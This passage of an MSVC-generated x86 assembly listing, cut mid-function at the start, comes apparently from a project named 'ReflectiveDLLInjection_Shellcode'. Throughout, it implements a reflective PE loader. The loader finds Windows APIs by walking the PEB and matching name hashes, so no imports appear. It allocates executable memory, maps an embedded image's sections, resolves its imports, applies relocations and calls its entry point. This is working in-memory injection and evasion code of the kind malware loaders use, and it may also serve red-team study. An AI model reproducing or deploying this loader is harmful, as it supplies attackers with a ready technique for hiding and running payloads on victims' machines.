	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	cmp	DWORD PTR [ecx+eax+120], 0
	je	$LN7@get_functi
; Line 261
	mov	edx, 8
	imul	eax, edx, 0
	mov	ecx, DWORD PTR _hImageNtHeaders$6[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+eax+120]
	mov	DWORD PTR _hImageExportDirectory$10[ebp], edx
; Line 263
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _hBase$11[ebp]
	add	ecx, DWORD PTR [eax+32]
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
; Line 264
	mov	edx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx+36]
	mov	DWORD PTR _pOrdinalPointers$7[ebp], eax
; Line 265
	mov	ecx, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	edx, DWORD PTR _hBase$11[ebp]
	add	edx, DWORD PTR [ecx+28]
	mov	DWORD PTR _pAddressesPointers$3[ebp], edx
; Line 268
	mov	DWORD PTR _i$9[ebp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	eax, DWORD PTR _i$9[ebp]
	add	eax, 1
	mov	DWORD PTR _i$9[ebp], eax
	mov	ecx, DWORD PTR _pNamePointers$8[ebp]
	add	ecx, 4
	mov	DWORD PTR _pNamePointers$8[ebp], ecx
	mov	edx, DWORD PTR _pOrdinalPointers$7[ebp]
	add	edx, 2
	mov	DWORD PTR _pOrdinalPointers$7[ebp], edx
$LN6@get_functi:
	mov	eax, DWORD PTR _hImageExportDirectory$10[ebp]
	mov	ecx, DWORD PTR _i$9[ebp]
	cmp	ecx, DWORD PTR [eax+24]
	jae	SHORT $LN7@get_functi
; Line 270
	lea	ecx, DWORD PTR $T1[ebp]
	call	??0?$importless_api@$0PBKAJNIB@@importless_api@@QAE@XZ ; importless_api::importless_api<4053835137>::importless_api<4053835137>
	mov	ecx, eax
	call	?get_hash@?$importless_api@$0PBKAJNIB@@importless_api@@QAEIXZ ; importless_api::importless_api<4053835137>::get_hash
	push	eax
	mov	edx, DWORD PTR _pNamePointers$8[ebp]
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR [edx]
	push	eax
	call	?hash_str@importless_api@@YAIPBDI@Z	; importless_api::hash_str
	add	esp, 8
	mov	DWORD PTR _func_hash$4[ebp], eax
; Line 271
	cmp	DWORD PTR _func_hash$4[ebp], 1746173916	; 68147fdcH
	jne	SHORT $LN8@get_functi
; Line 273
	mov	ecx, DWORD PTR _pOrdinalPointers$7[ebp]
	movzx	edx, WORD PTR [ecx]
	mov	eax, DWORD PTR _pAddressesPointers$3[ebp]
	mov	ecx, DWORD PTR [eax+edx*4]
	mov	DWORD PTR _dwFuncRVA$2[ebp], ecx
; Line 276
	mov	eax, DWORD PTR _hBase$11[ebp]
	add	eax, DWORD PTR _dwFuncRVA$2[ebp]
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	SHORT $LN4@get_functi
$LN7@get_functi:
; Line 281
	mov	edx, DWORD PTR _curr_module$[ebp]
	mov	eax, DWORD PTR [edx]
	mov	DWORD PTR _curr_module$[ebp], eax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	mov	esp, ebp
	pop	ebp
	ret	0
?get_function@?$importless_api@$0GIBEHPNM@@importless_api@@QAEPAXXZ ENDP ; importless_api::importless_api<1746173916>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0GIBEHPNM@@importless_api@@QAE@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
??0?$importless_api@$0GIBEHPNM@@importless_api@@QAE@XZ PROC ; importless_api::importless_api<1746173916>::importless_api<1746173916>, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 237
	mov	eax, DWORD PTR _this$[ebp]
	mov	DWORD PTR [eax], 1746173916		; 68147fdcH
; Line 238
	mov	eax, DWORD PTR _this$[ebp]
	mov	esp, ebp
	pop	ebp
	ret	0
??0?$importless_api@$0GIBEHPNM@@importless_api@@QAE@XZ ENDP ; importless_api::importless_api<1746173916>::importless_api<1746173916>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0GIBEHPNM@@importless_api@@AAEPBUPEB_T@win@2@XZ
_TEXT	SEGMENT
_this$ = -4						; size = 4
?peb@?$importless_api@$0GIBEHPNM@@importless_api@@AAEPBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<1746173916>::peb, COMDAT
; _this$ = ecx
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	push	ebp
	mov	ebp, esp
	push	ecx
	mov	DWORD PTR _this$[ebp], ecx
; Line 217
	mov	eax, DWORD PTR fs:48
; Line 227
	mov	esp, ebp
	pop	ebp
	ret	0
?peb@?$importless_api@$0GIBEHPNM@@importless_api@@AAEPBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<1746173916>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
$T1 = -136						; size = 4
$T2 = -132						; size = 4
$T3 = -128						; size = 4
$T4 = -124						; size = 4
_dwEntryAddress$ = -120					; size = 4
_dwNumberOfEntries$5 = -116				; size = 4
_dwThunkImportByName$6 = -112				; size = 4
_dwLibraryOrdinalFunctionAbsolute$7 = -108		; size = 4
_dwLibraryOrdinalFunctionRVA$8 = -104			; size = 4
_dwLibraryExport_AddressOfFunctions$9 = -100		; size = 4
_dwLibraryOrdinalPosition$10 = -96			; size = 4
_dwLibraryExportDirectory$11 = -92			; size = 4
_dwLibraryNtHeaders$12 = -88				; size = 4
_dwImportDirectory$ = -84				; size = 4
_dwSectionVirtualAddress$13 = -80			; size = 4
_dwSectionPhysicalAddress$14 = -76			; size = 4
_dwRelocationDirectory$ = -72				; size = 4
_dwLibraryExportDirectoryAddress$15 = -68		; size = 4
_i$16 = -64						; size = 4
_i$17 = -60						; size = 4
_dwDeltaAddresses$ = -56				; size = 4
_dwCurrentSection$ = -52				; size = 4
_j$18 = -48						; size = 4
_i$19 = -44						; size = 4
_dwImportDirectoryAddress$ = -40			; size = 4
_dwOriginalFirstThunk$20 = -36				; size = 4
_dwFirstThunk$21 = -32					; size = 4
_dwLibraryAddress$22 = -28				; size = 4
_dwRelocBlock$23 = -24					; size = 4
_dwPeAddress$ = -20					; size = 4
_dwRelocationBlock$24 = -16				; size = 4
_dwBaseAddress$ = -12					; size = 4
_dwNtHeaders$ = -8					; size = 4
_dwCurrentEntry$25 = -4					; size = 4
?reflective_injection@@YAHXZ PROC			; reflective_injection
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.cpp
; Line 37
	push	ebp
	mov	ebp, esp
	sub	esp, 136				; 00000088H
	push	esi
; Line 52
	call	?caller@@YAKXZ				; caller
	mov	DWORD PTR _dwPeAddress$[ebp], eax
$LN2@reflective:
; Line 53
	mov	eax, 1
	test	eax, eax
	je	SHORT $LN3@reflective
; Line 55
	mov	ecx, DWORD PTR _dwPeAddress$[ebp]
	movzx	edx, WORD PTR [ecx]
	cmp	edx, 23117				; 00005a4dH
	jne	SHORT $LN22@reflective
; Line 57
	mov	eax, DWORD PTR _dwPeAddress$[ebp]
	mov	ecx, DWORD PTR [eax+60]
	mov	DWORD PTR _dwNtHeaders$[ebp], ecx
; Line 61
	cmp	DWORD PTR _dwNtHeaders$[ebp], 64	; 00000040H
	jb	SHORT $LN22@reflective
	cmp	DWORD PTR _dwNtHeaders$[ebp], 1024	; 00000400H
	jae	SHORT $LN22@reflective
; Line 63
	mov	edx, DWORD PTR _dwPeAddress$[ebp]
	add	edx, DWORD PTR _dwNtHeaders$[ebp]
	mov	DWORD PTR _dwNtHeaders$[ebp], edx
; Line 66
	mov	eax, DWORD PTR _dwNtHeaders$[ebp]
	cmp	DWORD PTR [eax], 17744			; 00004550H
	jne	SHORT $LN22@reflective
; Line 67
	jmp	SHORT $LN3@reflective
$LN22@reflective:
; Line 72
	mov	ecx, DWORD PTR _dwPeAddress$[ebp]
	add	ecx, 1
	mov	DWORD PTR _dwPeAddress$[ebp], ecx
; Line 73
	jmp	SHORT $LN2@reflective
$LN3@reflective:
; Line 93
	push	64					; 00000040H
	push	12288					; 00003000H
	mov	edx, DWORD PTR _dwNtHeaders$[ebp]
	mov	eax, DWORD PTR [edx+80]
	push	eax
	push	0
	lea	ecx, DWORD PTR $T4[ebp]
	call	??0?$importless_api@$0GIBEHPNM@@importless_api@@QAE@XZ ; importless_api::importless_api<1746173916>::importless_api<1746173916>
	mov	ecx, eax
	call	?get_function@?$importless_api@$0GIBEHPNM@@importless_api@@QAEPAXXZ ; importless_api::importless_api<1746173916>::get_function
	call	eax
	mov	DWORD PTR _dwBaseAddress$[ebp], eax
; Line 96
	mov	DWORD PTR _i$19[ebp], 0
	jmp	SHORT $LN6@reflective
$LN4@reflective:
	mov	ecx, DWORD PTR _i$19[ebp]
	add	ecx, 1
	mov	DWORD PTR _i$19[ebp], ecx
$LN6@reflective:
	mov	edx, DWORD PTR _dwNtHeaders$[ebp]
	mov	eax, DWORD PTR _i$19[ebp]
	cmp	eax, DWORD PTR [edx+84]
	jae	SHORT $LN5@reflective
; Line 98
	mov	ecx, DWORD PTR _dwBaseAddress$[ebp]
	add	ecx, DWORD PTR _i$19[ebp]
	mov	edx, DWORD PTR _dwPeAddress$[ebp]
	add	edx, DWORD PTR _i$19[ebp]
	mov	al, BYTE PTR [edx]
	mov	BYTE PTR [ecx], al
; Line 99
	jmp	SHORT $LN4@reflective
$LN5@reflective:
; Line 111
	mov	ecx, DWORD PTR _dwNtHeaders$[ebp]
	movzx	edx, WORD PTR [ecx+20]
	mov	eax, DWORD PTR _dwNtHeaders$[ebp]
	lea	ecx, DWORD PTR [eax+edx+24]
	mov	DWORD PTR _dwCurrentSection$[ebp], ecx
; Line 114
	mov	DWORD PTR _i$17[ebp], 0
	jmp	SHORT $LN9@reflective
$LN7@reflective:
	mov	edx, DWORD PTR _i$17[ebp]
	add	edx, 1
	mov	DWORD PTR _i$17[ebp], edx
$LN9@reflective:
	mov	eax, DWORD PTR _dwNtHeaders$[ebp]
	movzx	ecx, WORD PTR [eax+6]
	cmp	DWORD PTR _i$17[ebp], ecx
	jae	SHORT $LN8@reflective
; Line 117
	mov	edx, DWORD PTR _dwCurrentSection$[ebp]
	mov	eax, DWORD PTR [edx+12]
	mov	DWORD PTR _dwSectionVirtualAddress$13[ebp], eax
; Line 120
	mov	ecx, DWORD PTR _dwCurrentSection$[ebp]
	mov	edx, DWORD PTR [ecx+20]
	mov	DWORD PTR _dwSectionPhysicalAddress$14[ebp], edx
; Line 123
	mov	DWORD PTR _j$18[ebp], 0
	jmp	SHORT $LN12@reflective
$LN10@reflective:
	mov	eax, DWORD PTR _j$18[ebp]
	add	eax, 1
	mov	DWORD PTR _j$18[ebp], eax
$LN12@reflective:
	mov	ecx, DWORD PTR _dwCurrentSection$[ebp]
	mov	edx, DWORD PTR _j$18[ebp]
	cmp	edx, DWORD PTR [ecx+16]
	jae	SHORT $LN11@reflective
; Line 125
	mov	eax, DWORD PTR _dwPeAddress$[ebp]
	add	eax, DWORD PTR _dwSectionPhysicalAddress$14[ebp]
	mov	ecx, DWORD PTR _dwBaseAddress$[ebp]
	add	ecx, DWORD PTR _dwSectionVirtualAddress$13[ebp]
	mov	edx, DWORD PTR _j$18[ebp]
	mov	esi, DWORD PTR _j$18[ebp]
	mov	al, BYTE PTR [eax+esi]
	mov	BYTE PTR [ecx+edx], al
; Line 126
	jmp	SHORT $LN10@reflective
$LN11@reflective:
; Line 129
	mov	ecx, DWORD PTR _dwCurrentSection$[ebp]
	add	ecx, 40					; 00000028H
	mov	DWORD PTR _dwCurrentSection$[ebp], ecx
; Line 130
	jmp	SHORT $LN7@reflective
$LN8@reflective:
; Line 142
	mov	edx, 8
	shl	edx, 0
	mov	eax, DWORD PTR _dwNtHeaders$[ebp]
	lea	ecx, DWORD PTR [eax+edx+120]
	mov	DWORD PTR _dwImportDirectory$[ebp], ecx
; Line 145
	mov	edx, DWORD PTR _dwImportDirectory$[ebp]
	mov	eax, DWORD PTR _dwBaseAddress$[ebp]
	add	eax, DWORD PTR [edx]
	mov	DWORD PTR _dwImportDirectoryAddress$[ebp], eax
$LN13@reflective:
; Line 148
	mov	ecx, DWORD PTR _dwImportDirectoryAddress$[ebp]
	cmp	DWORD PTR [ecx+12], 0
	je	$LN14@reflective
; Line 150
	mov	edx, DWORD PTR _dwImportDirectoryAddress$[ebp]
	mov	eax, DWORD PTR _dwBaseAddress$[ebp]
	add	eax, DWORD PTR [edx+12]
	push	eax
	lea	ecx, DWORD PTR $T3[ebp]
	call	??0?$importless_api@$0FCDEOHLE@@importless_api@@QAE@XZ ; importless_api::importless_api<1379198900>::importless_api<1379198900>
	mov	ecx, eax
	call	?get_function@?$importless_api@$0FCDEOHLE@@importless_api@@QAEPAXXZ ; importless_api::importless_api<1379198900>::get_function
	call	eax
	mov	DWORD PTR _dwLibraryAddress$22[ebp], eax
; Line 153
	mov	ecx, DWORD PTR _dwImportDirectoryAddress$[ebp]
	mov	edx, DWORD PTR _dwBaseAddress$[ebp]
	add	edx, DWORD PTR [ecx]
	mov	DWORD PTR _dwOriginalFirstThunk$20[ebp], edx
; Line 156
	mov	eax, DWORD PTR _dwImportDirectoryAddress$[ebp]
	mov	ecx, DWORD PTR _dwBaseAddress$[ebp]
	add	ecx, DWORD PTR [eax+16]
	mov	DWORD PTR _dwFirstThunk$21[ebp], ecx
$LN15@reflective:
; Line 159
	mov	edx, DWORD PTR _dwFirstThunk$21[ebp]
	cmp	DWORD PTR [edx], 0
	je	$LN16@reflective
; Line 162
	cmp	DWORD PTR _dwOriginalFirstThunk$20[ebp], 0
	je	SHORT $LN25@reflective
	mov	eax, DWORD PTR _dwOriginalFirstThunk$20[ebp]
	mov	ecx, DWORD PTR [eax]
	and	ecx, -2147483648			; 80000000H
	je	SHORT $LN25@reflective
; Line 164
	mov	edx, DWORD PTR _dwLibraryAddress$22[ebp]
	mov	eax, DWORD PTR _dwLibraryAddress$22[ebp]
	add	eax, DWORD PTR [edx+60]
	mov	DWORD PTR _dwLibraryNtHeaders$12[ebp], eax
; Line 166
	mov	ecx, 8
	imul	edx, ecx, 0
	mov	eax, DWORD PTR _dwLibraryNtHeaders$12[ebp]
	lea	ecx, DWORD PTR [eax+edx+120]
	mov	DWORD PTR _dwLibraryExportDirectory$11[ebp], ecx
; Line 168
	mov	edx, DWORD PTR _dwLibraryExportDirectory$11[ebp]
	mov	eax, DWORD PTR _dwLibraryAddress$22[ebp]
	add	eax, DWORD PTR [edx]
	mov	DWORD PTR _dwLibraryExportDirectoryAddress$15[ebp], eax
; Line 170
	mov	ecx, DWORD PTR _dwLibraryExportDirectoryAddress$15[ebp]
	mov	edx, DWORD PTR _dwLibraryAddress$22[ebp]
	add	edx, DWORD PTR [ecx+28]
	mov	DWORD PTR _dwLibraryExport_AddressOfFunctions$9[ebp], edx
; Line 173
	mov	eax, DWORD PTR _dwOriginalFirstThunk$20[ebp]
	mov	ecx, DWORD PTR [eax]
	and	ecx, 65535				; 0000ffffH
	mov	edx, DWORD PTR _dwLibraryExportDirectoryAddress$15[ebp]
	sub	ecx, DWORD PTR [edx+16]
	mov	DWORD PTR _dwLibraryOrdinalPosition$10[ebp], ecx
; Line 178
	mov	eax, DWORD PTR _dwLibraryOrdinalPosition$10[ebp]
	mov	ecx, DWORD PTR _dwLibraryExport_AddressOfFunctions$9[ebp]
	lea	edx, DWORD PTR [ecx+eax*4]
	mov	DWORD PTR _dwLibraryOrdinalFunctionRVA$8[ebp], edx
; Line 180
	mov	eax, DWORD PTR _dwLibraryAddress$22[ebp]
	add	eax, DWORD PTR _dwLibraryOrdinalFunctionRVA$8[ebp]
	mov	DWORD PTR _dwLibraryOrdinalFunctionAbsolute$7[ebp], eax
; Line 183
	mov	ecx, DWORD PTR _dwFirstThunk$21[ebp]
	mov	edx, DWORD PTR _dwLibraryOrdinalFunctionAbsolute$7[ebp]
	mov	DWORD PTR [ecx], edx
; Line 184
	jmp	SHORT $LN26@reflective
$LN25@reflective:
; Line 188
	mov	eax, DWORD PTR _dwFirstThunk$21[ebp]
	mov	ecx, DWORD PTR _dwBaseAddress$[ebp]
	add	ecx, DWORD PTR [eax]
	mov	DWORD PTR _dwThunkImportByName$6[ebp], ecx
; Line 191
	mov	edx, DWORD PTR _dwThunkImportByName$6[ebp]
	add	edx, 2
	push	edx
	mov	eax, DWORD PTR _dwLibraryAddress$22[ebp]
	push	eax
	lea	ecx, DWORD PTR $T2[ebp]
	call	??0?$importless_api@$0BPALGAN@@importless_api@@QAE@XZ ; importless_api::importless_api<32552461>::importless_api<32552461>
	mov	ecx, eax
	call	?get_function@?$importless_api@$0BPALGAN@@importless_api@@QAEPAXXZ ; importless_api::importless_api<32552461>::get_function
	call	eax
	mov	ecx, DWORD PTR _dwFirstThunk$21[ebp]
	mov	DWORD PTR [ecx], eax
$LN26@reflective:
; Line 195
	mov	edx, DWORD PTR _dwFirstThunk$21[ebp]
	add	edx, 4
	mov	DWORD PTR _dwFirstThunk$21[ebp], edx
; Line 196
	cmp	DWORD PTR _dwOriginalFirstThunk$20[ebp], 0
	je	SHORT $LN27@reflective
; Line 197
	mov	eax, DWORD PTR _dwOriginalFirstThunk$20[ebp]
	add	eax, 4
	mov	DWORD PTR _dwOriginalFirstThunk$20[ebp], eax
$LN27@reflective:
; Line 199
	jmp	$LN15@reflective
$LN16@reflective:
; Line 202
	mov	ecx, DWORD PTR _dwImportDirectoryAddress$[ebp]
	add	ecx, 20					; 00000014H
	mov	DWORD PTR _dwImportDirectoryAddress$[ebp], ecx
; Line 203
	jmp	$LN13@reflective
$LN14@reflective:
; Line 215
	mov	edx, DWORD PTR _dwNtHeaders$[ebp]
	mov	eax, DWORD PTR _dwBaseAddress$[ebp]
	sub	eax, DWORD PTR [edx+52]
	mov	DWORD PTR _dwDeltaAddresses$[ebp], eax
; Line 217
	mov	ecx, 8
	imul	edx, ecx, 5
	mov	eax, DWORD PTR _dwNtHeaders$[ebp]
	lea	ecx, DWORD PTR [eax+edx+120]
	mov	DWORD PTR _dwRelocationDirectory$[ebp], ecx
; Line 220
	mov	edx, DWORD PTR _dwRelocationDirectory$[ebp]
	cmp	DWORD PTR [edx+4], 0
	je	$LN28@reflective
; Line 222
	mov	eax, DWORD PTR _dwRelocationDirectory$[ebp]
	mov	ecx, DWORD PTR _dwBaseAddress$[ebp]
	add	ecx, DWORD PTR [eax]
	mov	DWORD PTR _dwRelocBlock$23[ebp], ecx
$LN17@reflective:
; Line 226
	mov	edx, DWORD PTR _dwRelocBlock$23[ebp]
	cmp	DWORD PTR [edx+4], 0
	je	$LN28@reflective
; Line 228
	mov	eax, DWORD PTR _dwRelocBlock$23[ebp]
	mov	ecx, DWORD PTR _dwBaseAddress$[ebp]
	add	ecx, DWORD PTR [eax]
	mov	DWORD PTR _dwRelocationBlock$24[ebp], ecx
; Line 230
	mov	edx, DWORD PTR _dwRelocBlock$23[ebp]
	mov	eax, DWORD PTR [edx+4]
	sub	eax, 8
	shr	eax, 1
	mov	DWORD PTR _dwNumberOfEntries$5[ebp], eax
; Line 233
	mov	ecx, DWORD PTR _dwRelocBlock$23[ebp]
	add	ecx, 8
	mov	DWORD PTR _dwCurrentEntry$25[ebp], ecx
; Line 236
	mov	DWORD PTR _i$16[ebp], 0
	jmp	SHORT $LN21@reflective
$LN19@reflective:
	mov	edx, DWORD PTR _i$16[ebp]
	add	edx, 1
	mov	DWORD PTR _i$16[ebp], edx
$LN21@reflective:
	mov	eax, DWORD PTR _i$16[ebp]
	cmp	eax, DWORD PTR _dwNumberOfEntries$5[ebp]
	jae	$LN20@reflective
; Line 238
	mov	ecx, DWORD PTR _dwCurrentEntry$25[ebp]
	mov	dx, WORD PTR [ecx]
	shr	dx, 12					; 0000000cH
	and	dx, 15					; 0000000fH
	movzx	eax, dx
	cmp	eax, 10					; 0000000aH
	jne	SHORT $LN29@reflective
; Line 240
	mov	ecx, 4095				; 00000fffH
	mov	edx, DWORD PTR _dwCurrentEntry$25[ebp]
	and	cx, WORD PTR [edx]
	movzx	eax, cx
	mov	ecx, DWORD PTR _dwRelocationBlock$24[ebp]
	mov	edx, DWORD PTR [ecx+eax]
	add	edx, DWORD PTR _dwDeltaAddresses$[ebp]
	mov	eax, 4095				; 00000fffH
	mov	ecx, DWORD PTR _dwCurrentEntry$25[ebp]
	and	ax, WORD PTR [ecx]
	movzx	eax, ax
	mov	ecx, DWORD PTR _dwRelocationBlock$24[ebp]
	mov	DWORD PTR [ecx+eax], edx
; Line 241
	jmp	$LN30@reflective
$LN29@reflective:
; Line 242
	mov	edx, DWORD PTR _dwCurrentEntry$25[ebp]
	mov	ax, WORD PTR [edx]
	shr	ax, 12					; 0000000cH
	and	ax, 15					; 0000000fH
	movzx	ecx, ax
	cmp	ecx, 3
	jne	SHORT $LN31@reflective
; Line 244
	mov	edx, 4095				; 00000fffH
	mov	eax, DWORD PTR _dwCurrentEntry$25[ebp]
	and	dx, WORD PTR [eax]
	movzx	ecx, dx
	mov	edx, DWORD PTR _dwRelocationBlock$24[ebp]
	mov	eax, DWORD PTR [edx+ecx]
	add	eax, DWORD PTR _dwDeltaAddresses$[ebp]
	mov	ecx, 4095				; 00000fffH
	mov	edx, DWORD PTR _dwCurrentEntry$25[ebp]
	and	cx, WORD PTR [edx]
	movzx	ecx, cx
	mov	edx, DWORD PTR _dwRelocationBlock$24[ebp]
	mov	DWORD PTR [edx+ecx], eax
; Line 245
	jmp	$LN30@reflective
$LN31@reflective:
; Line 246
	mov	eax, DWORD PTR _dwCurrentEntry$25[ebp]
	mov	cx, WORD PTR [eax]
	shr	cx, 12					; 0000000cH
	and	cx, 15					; 0000000fH
	movzx	edx, cx
	cmp	edx, 1
	jne	SHORT $LN33@reflective
; Line 248
	mov	eax, 4095				; 00000fffH
	mov	ecx, DWORD PTR _dwCurrentEntry$25[ebp]
	and	ax, WORD PTR [ecx]
	movzx	edx, ax
	mov	eax, DWORD PTR _dwDeltaAddresses$[ebp]
	shr	eax, 16					; 00000010H
	and	eax, 65535				; 0000ffffH
	movzx	ecx, ax
	mov	eax, DWORD PTR _dwRelocationBlock$24[ebp]
	movzx	edx, WORD PTR [eax+edx]
	add	edx, ecx
	mov	eax, 4095				; 00000fffH
	mov	ecx, DWORD PTR _dwCurrentEntry$25[ebp]
	and	ax, WORD PTR [ecx]
	movzx	eax, ax
	mov	ecx, DWORD PTR _dwRelocationBlock$24[ebp]
	mov	WORD PTR [ecx+eax], dx
; Line 249
	jmp	SHORT $LN30@reflective
$LN33@reflective:
; Line 250
	mov	edx, DWORD PTR _dwCurrentEntry$25[ebp]
	mov	ax, WORD PTR [edx]
	shr	ax, 12					; 0000000cH
	and	ax, 15					; 0000000fH
	movzx	ecx, ax
	cmp	ecx, 2
	jne	SHORT $LN30@reflective
; Line 252
	mov	edx, 4095				; 00000fffH
	mov	eax, DWORD PTR _dwCurrentEntry$25[ebp]
	and	dx, WORD PTR [eax]
	movzx	ecx, dx
	mov	edx, DWORD PTR _dwDeltaAddresses$[ebp]
	and	edx, 65535				; 0000ffffH
	movzx	eax, dx
	mov	edx, DWORD PTR _dwRelocationBlock$24[ebp]
	movzx	ecx, WORD PTR [edx+ecx]
	add	ecx, eax
	mov	edx, 4095				; 00000fffH
	mov	eax, DWORD PTR _dwCurrentEntry$25[ebp]
	and	dx, WORD PTR [eax]
	movzx	edx, dx
	mov	eax, DWORD PTR _dwRelocationBlock$24[ebp]
	mov	WORD PTR [eax+edx], cx
$LN30@reflective:
; Line 256
	mov	ecx, DWORD PTR _dwCurrentEntry$25[ebp]
	add	ecx, 2
	mov	DWORD PTR _dwCurrentEntry$25[ebp], ecx
; Line 259
	jmp	$LN19@reflective
$LN20@reflective:
; Line 262
	mov	edx, DWORD PTR _dwRelocBlock$23[ebp]
	mov	eax, DWORD PTR _dwRelocBlock$23[ebp]
	add	eax, DWORD PTR [edx+4]
	mov	DWORD PTR _dwRelocBlock$23[ebp], eax
; Line 263
	jmp	$LN17@reflective
$LN28@reflective:
; Line 275
	mov	ecx, DWORD PTR _dwNtHeaders$[ebp]
	mov	edx, DWORD PTR _dwBaseAddress$[ebp]
	add	edx, DWORD PTR [ecx+40]
	mov	DWORD PTR _dwEntryAddress$[ebp], edx
; Line 280
	push	0
	push	0
	push	-1
	lea	ecx, DWORD PTR $T1[ebp]
	call	??0?$importless_api@$0OKDBEOND@@importless_api@@QAE@XZ ; importless_api::importless_api<3929099987>::importless_api<3929099987>
	mov	ecx, eax
	call	?get_function@?$importless_api@$0OKDBEOND@@importless_api@@QAEPAXXZ ; importless_api::importless_api<3929099987>::get_function
	call	eax
; Line 287
	call	DWORD PTR _dwEntryAddress$[ebp]
; Line 288
	pop	esi
	mov	esp, ebp
	pop	ebp
	ret	0
?reflective_injection@@YAHXZ ENDP			; reflective_injection
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
__$ReturnAddr$ = 4					; size = 4
?caller@@YAKXZ PROC					; caller
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.cpp
; Line 20
	push	ebp
	mov	ebp, esp
	mov	eax, DWORD PTR __$ReturnAddr$[ebp]
	pop	ebp
	ret	0
?caller@@YAKXZ ENDP					; caller
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?hash_str@importless_api@@YAIPBDI@Z
_TEXT	SEGMENT
_hash$ = -8						; size = 4
_c$1 = -1						; size = 1
_func_name$ = 8						; size = 4
_value$ = 12						; size = 4
?hash_str@importless_api@@YAIPBDI@Z PROC		; importless_api::hash_str, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 193
	push	ebp
	mov	ebp, esp
	sub	esp, 8
; Line 195
	mov	eax, DWORD PTR _value$[ebp]
	mov	DWORD PTR _hash$[ebp], eax
$LN4@hash_str:
; Line 198
	mov	ecx, DWORD PTR _func_name$[ebp]
	mov	dl, BYTE PTR [ecx]
	mov	BYTE PTR _c$1[ebp], dl
; Line 199
	mov	eax, DWORD PTR _func_name$[ebp]
	add	eax, 1
	mov	DWORD PTR _func_name$[ebp], eax
; Line 200
	movsx	ecx, BYTE PTR _c$1[ebp]
	test	ecx, ecx
	jne	SHORT $LN5@hash_str
; Line 201
	mov	eax, DWORD PTR _hash$[ebp]
	jmp	SHORT $LN1@hash_str
$LN5@hash_str:
; Line 203
	mov	edx, DWORD PTR _hash$[ebp]
	shl	edx, 5
	mov	eax, DWORD PTR _hash$[ebp]
	shr	eax, 27					; 0000001bH
	or	edx, eax
	movsx	ecx, BYTE PTR _c$1[ebp]
	add	edx, ecx
	mov	DWORD PTR _hash$[ebp], edx
; Line 204
	jmp	SHORT $LN4@hash_str
$LN1@hash_str:
; Line 205
	mov	esp, ebp
	pop	ebp
	ret	0
?hash_str@importless_api@@YAIPBDI@Z ENDP		; importless_api::hash_str
_TEXT	ENDS
END
